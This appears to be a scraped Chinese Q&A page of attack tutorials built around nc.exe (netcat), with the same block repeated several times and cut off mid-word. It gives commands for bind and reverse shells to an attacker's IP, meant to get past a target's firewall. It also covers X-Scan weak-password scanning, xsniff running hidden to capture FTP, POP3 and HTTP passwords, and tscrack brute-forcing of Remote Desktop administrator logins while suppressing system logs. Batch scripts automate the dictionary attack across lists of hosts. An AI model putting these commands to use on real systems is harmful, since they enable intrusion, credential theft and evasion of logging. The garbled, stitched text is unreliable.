本文目录一览：

• 1、nc.exe使用方法
• 2、小nc是什么？
• 3、谁知道nc.exe工作原理
• 4、黑客界被誉为瑞士军刀的NC是？求大神帮助
• 5、中华经典网络军刀NC如何使用
• 6、知道NC.exe的进

nc.exe使用方法

参数说明：

-h 查看帮助信息

-d 后台模式

-e prog程序重定向，一但连接就执行〔危险〕

-i secs延时的间隔

-l 监听模式，用于入站连接

-L 监听模式，连接天闭后仍然继续监听，直到CTR+C

-n IP地址，不能用域名

-o film记录16进制的传输

-p[空格]端口 本地端口号

-r 随机本地及远程端口

-t 使用Telnet交互方式

-u UDP模式

-v 详细输出，用-vv将更详细

-w数字 timeout延时间隔

-z 将输入，输出关掉（用于扫锚时）

基本用法：

nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口

nc -l -p 80 开启本机的TCP 80端口并监听

nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在

remote的TCP 5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的

cmdshell并反向连接192.168.0.2的5354端口

高级用法：

nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止

nc -L -p 80 c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到

CTR+C,同时把结果输出到c:\log.txt

nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，

直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用

type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端

口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用

本机上用：nc -l -p 本机端口

在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K

nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

本机上用：nc -d -l -p 本机端口 要传送的文件路径及名称

在对方主机上用：nc -vv 本机IP 本机端口 存放文件的路径及名称 传送文件

到对方主机

备 注：

| 管道命令

或 重定向命令。“”，例如：tlntadmn test.txt 指把test.txt的内容

赋值给tlntadmn命令

＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt

d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中

与的区别 ""指：覆盖；""指：保存到(添加到）。

如：@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个命令分别

执行二次比较看：用的则是把二次的结果都保存了，而用：则只有一次的结果

，是因为第二次的结果把第一次的覆盖了。

2、扫锚工具：xscan.exe

基本格式

xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止

IP"段的所有主机信息

xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件

名"中的所有主机信息

检测项目

-active 检测主机是否存活

-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）

-port 检测常用服务的端口状态

-ftp 检测FTP弱口令

-pub 检测FTP服务匿名用户写权限

-pop3 检测POP3-Server弱口令

-smtp 检测SMTP-Server漏洞

-sql 检测SQL-Server弱口令

-smb 检测NT-Server弱口令

-iis 检测IIS编码/解码漏洞

-cgi 检测CGI漏洞

-nasl 加载Nessus攻击脚本

-all 检测以上所有项目

其它选项

-i 适配器编号 设置网络适配器, 适配器编号可通过"-l"参数获取

-l 显示所有网络适配器

-v 显示详细扫描进度

-p 跳过没有响应的主机

-o 跳过没有检测到开放端口的主机

-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默

认数量为100,10

-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)

用法示例

xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测

192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测

192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大

并发线程数量为150，跳过没有检测到开放端口的主机

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”

文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同

一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机

3、命令行方式嗅探器: xsniff.exe

可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

参数说明

-tcp 输出TCP数据报

-udp 输出UDP数据报

-icmp 输出ICMP数据报

-pass 过滤密码信息

-hide 后台运行

-host 解析主机名

-addr IP地址 过滤IP地址

-port 端口 过滤端口

-log 文件名 将输出保存到文件

-asc 以ASCII形式输出

-hex 以16进制形式输出

用法示例

xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在

pass.log文件中

xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和

udp信息并以ASCII格式输出

4、终端服务密码破解: tscrack.exe

参数说明

-h 显示使用帮助

-v 显示版本信息

-s 在屏幕上打出解密能力

-b 密码错误时发出的声音

-t 同是发出多个连接（多线程）

-N Prevent System Log entries on targeted server

-U 卸载移除tscrack组件

-f 使用－f后面的密码

-F 间隔时间（频率）

-l 使用－l后面的用户名

-w 使用－w后面的密码字典

-p 使用－p后面的密码

-D 登录主页面

用法示例

tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破

主机的administrator的登陆密码

tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆

192.168.0.1的administrator用户

@if not exist ipcscan.txt goto noscan

@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i

nscan

@echo 3389.txt no find or scan faild

(①存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主

机IP列表文件3389.txt)

3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat

@if not exist tscrack.exe goto noscan

@tscrack %1 -l administrator -w pass.dic rouji.txt

:noscan

@echo tscrack.exe no find or scan faild

(②存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、

pass.dic与tscrack.exe在同一个目录下；就可以等待结果了)

hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的

administrator密码，并将破解结果保存在rouji.txt文件中。

本人比较懒汗，那么多呢！～不去记了整理出来HOHO大家也能用着，嘎嘎～

参数说明：

-h 查看帮助信息

-d 后台模式

-e prog程序重定向，一但连接就执行〔危险〕

-i secs延时的间隔

-l 监听模式，用于入站连接

-L 监听模式，连接天闭后仍然继续监听，直到CTR+C

-n IP地址，不能用域名

-o film记录16进制的传输

-p[空格]端口 本地端口号

-r 随机本地及远程端口

-t 使用Telnet交互方式

-u UDP模式

-v 详细输出，用-vv将更详细

-w数字 timeout延时间隔

-z 将输入，输出关掉（用于扫锚时）

基本用法：

nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口

nc -l -p 80 开启本机的TCP 80端口并监听

nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在

remote的TCP 5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的

cmdshell并反向连接192.168.0.2的5354端口

高级用法：

nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止

nc -L -p 80 c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到

CTR+C,同时把结果输出到c:\log.txt

nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，

直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用

type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端

口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用

本机上用：nc -l -p 本机端口

在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K

nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

本机上用：nc -d -l -p 本机端口 要传送的文件路径及名称

在对方主机上用：nc -vv 本机IP 本机端口 存放文件的路径及名称 传送文件

到对方主机

备 注：

| 管道命令

或 重定向命令。“”，例如：tlntadmn test.txt 指把test.txt的内容

赋值给tlntadmn命令

＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt

d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中

与的区别 ""指：覆盖；""指：保存到(添加到）。

如：@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个命令分别

执行二次比较看：用的则是把二次的结果都保存了，而用：则只有一次的结果

，是因为第二次的结果把第一次的覆盖了。

2、扫锚工具：xscan.exe

基本格式

xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止

IP"段的所有主机信息

xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件

名"中的所有主机信息

检测项目

-active 检测主机是否存活

-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）

-port 检测常用服务的端口状态

-ftp 检测FTP弱口令

-pub 检测FTP服务匿名用户写权限

-pop3 检测POP3-Server弱口令

-smtp 检测SMTP-Server漏洞

-sql 检测SQL-Server弱口令

-smb 检测NT-Server弱口令

-iis 检测IIS编码/解码漏洞

-cgi 检测CGI漏洞

-nasl 加载Nessus攻击脚本

-all 检测以上所有项目

其它选项

-i 适配器编号 设置网络适配器, 适配器编号可通过"-l"参数获取

-l 显示所有网络适配器

-v 显示详细扫描进度

-p 跳过没有响应的主机

-o 跳过没有检测到开放端口的主机

-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默

认数量为100,10

-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)

用法示例

xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测

192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测

192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大

并发线程数量为150，跳过没有检测到开放端口的主机

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”

文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同

一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机

3、命令行方式嗅探器: xsniff.exe

可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

参数说明

-tcp 输出TCP数据报

-udp 输出UDP数据报

-icmp 输出ICMP数据报

-pass 过滤密码信息

-hide 后台运行

-host 解析主机名

-addr IP地址 过滤IP地址

-port 端口 过滤端口

-log 文件名 将输出保存到文件

-asc 以ASCII形式输出

-hex 以16进制形式输出

用法示例

xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在

pass.log文件中

xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和

udp信息并以ASCII格式输出

4、终端服务密码破解: tscrack.exe

参数说明

-h 显示使用帮助

-v 显示版本信息

-s 在屏幕上打出解密能力

-b 密码错误时发出的声音

-t 同是发出多个连接（多线程）

-N Prevent System Log entries on targeted server

-U 卸载移除tscrack组件

-f 使用－f后面的密码

-F 间隔时间（频率）

-l 使用－l后面的用户名

-w 使用－w后面的密码字典

-p 使用－p后面的密码

-D 登录主页面

用法示例

tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破

主机的administrator的登陆密码

tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆

192.168.0.1的administrator用户

@if not exist ipcscan.txt goto noscan

@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i

nscan

@echo 3389.txt no find or scan faild

(①存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主

机IP列表文件3389.txt)

3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat

@if not exist tscrack.exe goto noscan

@tscrack %1 -l administrator -w pass.dic rouji.txt

:noscan

@echo tscrack.exe no find or scan faild

(②存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、

pass.dic与tscrack.exe在同一个目录下；就可以等待结果了)

hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的

administrator密码，并将破解结果保存在rouji.txt文件中。

本人比较懒汗，那么多呢！～不去记了整理出来HOHO大家也能用着，嘎嘎～

参数说明：

-h 查看帮助信息

-d 后台模式

-e prog程序重定向，一但连接就执行〔危险〕

-i secs延时的间隔

-l 监听模式，用于入站连接

-L 监听模式，连接天闭后仍然继续监听，直到CTR+C

-n IP地址，不能用域名

-o film记录16进制的传输

-p[空格]端口 本地端口号

-r 随机本地及远程端口

-t 使用Telnet交互方式

-u UDP模式

-v 详细输出，用-vv将更详细

-w数字 timeout延时间隔

-z 将输入，输出关掉（用于扫锚时）

基本用法：

nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口

nc -l -p 80 开启本机的TCP 80端口并监听

nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在

remote的TCP 5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的

cmdshell并反向连接192.168.0.2的5354端口

高级用法：

nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止

nc -L -p 80 c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到

CTR+C,同时把结果输出到c:\log.txt

nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，

直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用

type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端

口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用

本机上用：nc -l -p 本机端口

在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K

nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

本机上用：nc -d -l -p 本机端口 要传送的文件路径及名称

在对方主机上用：nc -vv 本机IP 本机端口 存放文件的路径及名称 传送文件

到对方主机

备 注：

| 管道命令

或 重定向命令。“”，例如：tlntadmn test.txt 指把test.txt的内容

赋值给tlntadmn命令

＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt

d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中

与的区别 ""指：覆盖；""指：保存到(添加到）。

如：@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个命令分别

执行二次比较看：用的则是把二次的结果都保存了，而用：则只有一次的结果

，是因为第二次的结果把第一次的覆盖了。

2、扫锚工具：xscan.exe

基本格式

xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止

IP"段的所有主机信息

xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件

名"中的所有主机信息

检测项目

-active 检测主机是否存活

-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）

-port 检测常用服务的端口状态

-ftp 检测FTP弱口令

-pub 检测FTP服务匿名用户写权限

-pop3 检测POP3-Server弱口令

-smtp 检测SMTP-Server漏洞

-sql 检测SQL-Server弱口令

-smb 检测NT-Server弱口令

-iis 检测IIS编码/解码漏洞

-cgi 检测CGI漏洞

-nasl 加载Nessus攻击脚本

-all 检测以上所有项目

其它选项

-i 适配器编号 设置网络适配器, 适配器编号可通过"-l"参数获取

-l 显示所有网络适配器

-v 显示详细扫描进度

-p 跳过没有响应的主机

-o 跳过没有检测到开放端口的主机

-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默

认数量为100,10

-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)

用法示例

xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测

192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测

192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大

并发线程数量为150，跳过没有检测到开放端口的主机

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”

文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同

一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机

3、命令行方式嗅探器: xsniff.exe

可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

参数说明

-tcp 输出TCP数据报

-udp 输出UDP数据报

-icmp 输出ICMP数据报

-pass 过滤密码信息

-hide 后台运行

-host 解析主机名

-addr IP地址 过滤IP地址

-port 端口 过滤端口

-log 文件名 将输出保存到文件

-asc 以ASCII形式输出

-hex 以16进制形式输出

用法示例

xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在

pass.log文件中

xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和

udp信息并以ASCII格式输出

4、终端服务密码破解: tscrack.exe

参数说明

-h 显示使用帮助

-v 显示版本信息

-s 在屏幕上打出解密能力

-b 密码错误时发出的声音

-t 同是发出多个连接（多线程）

-N Prevent System Log entries on targeted server

-U 卸载移除tscrack组件

-f 使用－f后面的密码

-F 间隔时间（频率）

-l 使用－l后面的用户名

-w 使用－w后面的密码字典

-p 使用－p后面的密码

-D 登录主页面

用法示例

tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破

主机的administrator的登陆密码

tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆

192.168.0.1的administrator用户

@if not exist ipcscan.txt goto noscan

@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i

nscan

@echo 3389.txt no find or scan faild

(①存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主

机IP列表文件3389.txt)

3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat

@if not exist tscrack.exe goto noscan

@tscrack %1 -l administrator -w pass.dic rouji.txt

:noscan

@echo tscrack.exe no find or scan faild

(②存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、

pass.dic与tscrack.exe在同一个目录下；就可以等待结果了)

hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的

administrator密码，并将破解结果保存在rouji.txt文件中。

本人比较懒汗，那么多呢！～不去记了整理出来HOHO大家也能用着，嘎嘎～

参数说明：

-h 查看帮助信息

-d 后台模式

-e prog程序重定向，一但连接就执行〔危险〕

-i secs延时的间隔

-l 监听模式，用于入站连接

-L 监听模式，连接天闭后仍然继续监听，直到CTR+C

-n IP地址，不能用域名

-o film记录16进制的传输

-p[空格]端口 本地端口号

-r 随机本地及远程端口

-t 使用Telnet交互方式

-u UDP模式

-v 详细输出，用-vv将更详细

-w数字 timeout延时间隔

-z 将输入，输出关掉（用于扫锚时）

基本用法：

nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口

nc -l -p 80 开启本机的TCP 80端口并监听

nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在

remote的TCP 5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的

cmdshell并反向连接192.168.0.2的5354端口

高级用法：

nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止

nc -L -p 80 c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到

CTR+C,同时把结果输出到c:\log.txt

nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，

直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用

type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端

口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用

本机上用：nc -l -p 本机端口

在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K

nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

本机上用：nc -d -l -p 本机端口 要传送的文件路径及名称

在对方主机上用：nc -vv 本机IP 本机端口 存放文件的路径及名称 传送文件

到对方主机

备 注：

| 管道命令

或 重定向命令。“”，例如：tlntadmn test.txt 指把test.txt的内容

赋值给tlntadmn命令

＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt

d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中

与的区别 ""指：覆盖；""指：保存到(添加到）。

如：@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个命令分别

执行二次比较看：用的则是把二次的结果都保存了，而用：则只有一次的结果

，是因为第二次的结果把第一次的覆盖了。

2、扫锚工具：xscan.exe

基本格式

xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止

IP"段的所有主机信息

xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件

名"中的所有主机信息

检测项目

-active 检测主机是否存活

-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）

-port 检测常用服务的端口状态

-ftp 检测FTP弱口令

-pub 检测FTP服务匿名用户写权限

-pop3 检测POP3-Server弱口令

-smtp 检测SMTP-Server漏洞

-sql 检测SQL-Server弱口令

-smb 检测NT-Server弱口令

-iis 检测IIS编码/解码漏洞

-cgi 检测CGI漏洞

-nasl 加载Nessus攻击脚本

-all 检测以上所有项目

其它选项

-i 适配器编号 设置网络适配器, 适配器编号可通过"-l"参数获取

-l 显示所有网络适配器

-v 显示详细扫描进度

-p 跳过没有响应的主机

-o 跳过没有检测到开放端口的主机

-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默

认数量为100,10

-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)

用法示例

xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测

192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测

192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大

并发线程数量为150，跳过没有检测到开放端口的主机

xscan -file ho

小nc是什么？

没见过啊，参考个这个

NC

=National Certificate 国家合格证;

National Coarse thread 美制粗牙螺纹;

Natural Convection 自然对流;

Network Control 网络控制;

Neutralizing Capacitor 中和电容器;

New Caledonia 新喀里多尼亚(岛)(南太平洋);

nitrocellulose;

No Change 无变化;

No Connection 不连接, 无关系;

Noise Criterion噪音标准;

Non-Condensing非凝结的;

North Carolina北卡罗来纳(州)[美];

Numerical Control 数字[值]控制

还有

NC也可以叫做瘦客户端

NC是网络计算机(Networke Computer) 的简称，是一类基于网络计算环境的计算设备，除了必要的人机交换设备（如监视器和输入）外，一般没有外部存储设备，也很少有扩展口，NC可以实现Internet功能，通过网络进行信息查询和信息处理。实用、廉价、管理方便，在服务器端统一升级是其显著特点。

NC是Oracle公司于1995年提出的，当时在计算机和通信界引起极大反响，同年便成立了“网络计算机联盟”。随后，IBM、Apple、 Netscape、 Oracle和Sun等五大厂商联合公布了NC的工业标准--《网络计算机参考简要特征》（简称NC-1规范），内容包括支持Java、HTML、FTP、TCP/IP以及CGI的规范。包括世界最大的消费类和商业电子设备生产商、通信厂商、软件开发商、无线系统生产商、微处理器生产商、外设制造商以及信用卡公司等70多家厂商立即表示支持制定这一技术规范。

NC.EXE 常被用作黑客工具。主要用法如下

1)连接到REMOTE主机，例子： 格式：nc -nvv 192.168.x.x 80 讲解：连到192.168.x.x的TCP80端口

2)监听LOCAL主机，例子： 格式：nc -l -p 80 讲解：监听本机的TCP80端口 3)扫描远程主机，例子： 格式：nc -nvv -w2 -z 192.168.x.x 80-445 讲解：扫描192.168.x.x的TCP80到TCP445的所有端口

4)REMOTE主机绑定SHELL，例子： 格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5)REMOTE主机绑定SHELL并反向连接，例子： 格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法（其实NC的用法还有很多， 当配合管道命令"|"与重定向命令""、""等等命令功能更强大......）。

================= 高级用法========================：

6)作攻击程序用，例子： 格式1：type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2：nc-nvv192.168.x.x80讲解：连接到192.168.x.x的80端口，并在其管道中发送'c:\ex ploit.txt'的内容(两种格式确有相同的效果， 真是有异曲同工之妙:P) 附：'c:\exploit.txt'为shellcode等 7)作蜜罐用[1]，例子： 格式：nc -L -p 80 讲解：使用'-L'(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止 8)作蜜罐用[2]，例子： 格式：nc -L -p 80c:\log.txt 讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到'c:\log.txt'中，如果把' gt;' 改为''即可以追加日志 附：'c:\log.txt'为日志等 9)作蜜罐用[3]，例子： 格式1：nc -L -p 80

格式2：type.exe c:\honeypot.txt|nc -L -p 80 讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，并把'c:\honeypot.txt'的内容'送'入其 管道中

谁知道nc.exe工作原理

NC.EXE 常被用作黑客工具。主要用法如下

1)连接到REMOTE主机，例子： 格式：nc -nvv 192.168.x.x 80 讲解：连到192.168.x.x的TCP80端口

2)监听LOCAL主机，例子： 格式：nc -l -p 80 讲解：监听本机的TCP80端口 3)扫描远程主机，例子： 格式：nc -nvv -w2 -z 192.168.x.x 80-445 讲解：扫描192.168.x.x的TCP80到TCP445的所有端口

4)REMOTE主机绑定SHELL，例子： 格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5)REMOTE主机绑定SHELL并反向连接，例子： 格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法（其实NC的用法还有很多， 当配合管道命令"|"与重定向命令""、""等等命令功能更强大......）。

================= 高级用法========================：

6)作攻击程序用，例子： 格式1：type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2：nc-nvv192.168.x.x80讲解：连接到192.168.x.x的80端口，并在其管道中发送'c:\ex ploit.txt'的内容(两种格式确有相同的效果， 真是有异曲同工之妙:P) 附：'c:\exploit.txt'为shellcode等 7)作蜜罐用[1]，例子： 格式：nc -L -p 80 讲解：使用'-L'(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止 8)作蜜罐用[2]，例子： 格式：nc -L -p 80c:\log.txt 讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到'c:\log.txt'中，如果把' gt;' 改为''即可以追加日志 附：'c:\log.txt'为日志等 9)作蜜罐用[3]，例子： 格式1：nc -L -p 80

格式2：type.exe c:\honeypot.txt|nc -L -p 80 讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，并把'c:\honeypot.txt'的内容'送'入其 管道中

黑客界被誉为瑞士军刀的NC是？求大神帮助

NC.exe，一个体积不大，却功能强大的工具。 能够透过使用TCP或UDP协议的网络连接去读写数据。一个稳定的后门工具， 能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几 乎所有类型的网络连接。

满意请采纳

中华经典网络军刀NC如何使用

NC.EXE 常被用作黑客工具。主要用法如下

1)连接到REMOTE主机，例子： 格式：nc -nvv 192.168.x.x 80 讲解：连到192.168.x.x的TCP80端口

2)监听LOCAL主机，例子： 格式：nc -l -p 80 讲解：监听本机的TCP80端口

3)扫描远程主机，例子： 格式：nc -nvv -w2 -z 192.168.x.x 80-445 讲解：扫描192.168.x.x的TCP80到TCP445的所有端口

4)REMOTE主机绑定SHELL，例子： 格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5)REMOTE主机绑定SHELL并反向连接，例子： 格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法（其实NC的用法还有很多， 当配合管道命令"|"与重定向命令""、""等等命令功能更强大......）。

高级用法：

6)作攻击程序用，例子： 格式1：type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2：nc-nvv192.168.x.x80讲解：连接到192.168.x.x的80端口，并在其管道中发送'c:\ex ploit.txt'的内容(两种格式确有相同的效果， 真是有异曲同工之妙:P) 附：'c:\exploit.txt'为shellcode等

7)作蜜罐用[1]，例子： 格式：nc -L -p 80 讲解：使用'-L'(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止

8)作蜜罐用[2]，例子： 格式：nc -L -p 80c:\log.txt 讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到'c:\log.txt'中，如果把' gt;' 改为''即可以追加日志 附：'c:\log.txt'为日志等

9)作蜜罐用[3]，例子： 格式1：nc -L -p 80

格式2：type.exe c:\honeypot.txt|nc -L -p 80 讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，并把'c:\honeypot.txt'的内容'送'入其 管道中

知道NC.exe的进

NC.EXE 常被用作黑客工具。主要用法如下

1)连接到REMOTE主机，例子： 格式：nc -nvv 192.168.x.x 80 讲解：连到192.168.x.x的TCP80端口

